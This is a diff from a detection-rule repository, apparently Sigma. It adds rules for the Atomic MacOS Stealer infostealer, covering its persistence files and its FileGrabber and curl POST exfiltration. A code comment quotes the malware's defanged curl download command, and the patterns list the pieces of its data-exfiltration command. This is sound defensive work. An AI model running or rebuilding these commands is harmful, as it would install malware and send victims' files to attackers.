Merge PR #5669 from @JasonPhang98 - Extend Atomic MacOS Stealer - FileGrabber Rules

remove: Atomic MacOS Stealer - FileGrabber Infostealer Execution - deprecate in favor of e710a880-1f18-4417-b6a0-b5afdf7e33da
new: Atomic MacOS Stealer - Persistence Indicators
new: Atomic MacOS Stealer - FileGrabber Activity

---------
Co-authored-by: Swachchhanda Shrawan Poudel <87493836+swachchhanda000@users.noreply.github.com>
Co-authored-by: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>

deprecated/macos/proc_creation_macos_malware_amos_filegrabber_exec.yml

@@ -1,12 +1,14 @@
-title: MacOS FileGrabber Infostealer
+title: Atomic MacOS Stealer - FileGrabber Infostealer Execution
 id: e710a880-1f18-4417-b6a0-b5afdf7e305a
-status: experimental
-description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
+status: deprecated
+description: |
+    Detects the execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
 references:
     - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
     - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
 author: Jason Phang Vern - Onn (Gen Digital)
 date: 2025-09-12
+modified: 2025-11-22
 tags:
     - attack.execution
     - attack.t1059.002

rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/file_event_macos_malware_amos_persistence.yml

@@ -0,0 +1,32 @@
+title: Atomic MacOS Stealer - Persistence Indicators
+id: e710a880-1f18-4417-b6a0-b5afdf7e3023
+status: experimental
+description: |
+    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
+references:
+    - https://moonlock.com/amos-backdoor-persistent-access
+    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
+author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+date: 2025-11-22
+tags:
+    - attack.persistence
+    - attack.privilege-escalation
+    - attack.defense-evasion
+    - attack.t1564.001
+    - attack.t1543.004
+    - detection.emerging-threats
+logsource:
+    category: file_event
+    product: macos
+detection:
+    selection_user_helper:
+        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
+        Image|endswith: '/curl'
+        TargetFilename|startswith: '/Users/'
+        TargetFilename|endswith: '.helper'
+    selection_launchdaemon:
+        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
+    condition: 1 of selection_*
+falsepositives:
+    - Unknown
+level: high

rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/proc_creation_macos_malware_amos_curl_post.yml

@@ -0,0 +1,40 @@
+title: Atomic MacOS Stealer - FileGrabber Activity
+id: e710a880-1f18-4417-b6a0-b5afdf7e33da
+related:
+    - id: e710a880-1f18-4417-b6a0-b5afdf7e305a
+      type: obsolete
+status: experimental
+description: |
+    Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
+references:
+    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
+    - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
+    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
+    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
+author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+date: 2025-11-22
+tags:
+    - attack.execution
+    - attack.t1059.002
+    - detection.emerging-threats
+logsource:
+    category: process_creation
+    product: macos
+detection:
+    selection_curl_post:
+        CommandLine|contains|all:
+            - 'curl'
+            - 'POST'
+            - 'user:'
+            - '-H '
+            - 'BuildID'
+            - 'file=@/tmp/out.zip'
+            - 'cl: 0'
+    selection_filegrabber_exec:
+        CommandLine|contains|all:
+            - 'FileGrabber'
+            - '/tmp'
+    condition: 1 of selection_*
+falsepositives:
+    - Unknown
+level: high